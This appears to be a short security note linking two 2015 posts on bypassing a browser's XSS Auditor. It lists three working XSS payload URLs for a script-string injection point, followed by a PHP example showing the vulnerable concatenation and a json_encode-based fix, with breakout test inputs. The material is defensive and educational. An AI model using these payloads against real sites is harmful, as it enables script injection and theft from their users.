Original posts:
http://www.thespanner.co.uk/2015/02/10/xss-auditor-bypass/
http://www.thespanner.co.uk/2015/02/19/another-xss-auditor-bypass/

For the following injection point:

<script>x = "MY INJECTION"</script>

payload:

2.php?x=</script><svg><script>alert(1)%2b%26quot;
3.php?x="><script/src=data:,alert(1)%2b"
3.php?x="><script/src=data:,alert(1)%26sol;%26sol;
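
The injection point shown above puts request data inside a JavaScript string within a script block, so the server-side fix is output encoding for that context, independent of any browser filter. The PHP sketch below is an added example, not code from the original posts; the function names and sample inputs are constructed for illustration.

```php
<?php
// Added example (not from the original posts). Function names and sample
// inputs are constructed for illustration.

// Vulnerable form: request data is concatenated straight into the JS string.
function render_vulnerable(string $x): string
{
    return '<script>x = "' . $x . '"</script>';
}

// Hardened form: json_encode() emits a complete, quoted JS string literal.
// The JSON_HEX_* flags turn < > & ' " into \u00XX escapes, so the value can
// neither close the string nor put a literal "</script>" into the page.
// JSON_THROW_ON_ERROR (PHP 7.3+) makes invalid UTF-8 an exception instead of
// a silent false return.
function render_hardened(string $x): string
{
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
           | JSON_THROW_ON_ERROR;
    return '<script>x = ' . json_encode($x, $flags) . '</script>';
}

// Count what the HTML parser would treat as the end of a script block.
function script_end_tags(string $html): int
{
    return substr_count(strtolower($html), '</script');
}

// Constructed inputs: one ends the string literal, one ends the script block.
$samples = [
    'a"; b = "1',
    '</script><p>closed early</p>',
];

foreach ($samples as $x) {
    foreach (['render_vulnerable', 'render_hardened'] as $render) {
        $html = $render($x);
        printf("%-17s end tags=%d  %s\n", $render, script_end_tags($html), $html);
    }
}
```

In the hardened output every sample stays inside one quoted literal and the only `</script` in the page is the one the template wrote.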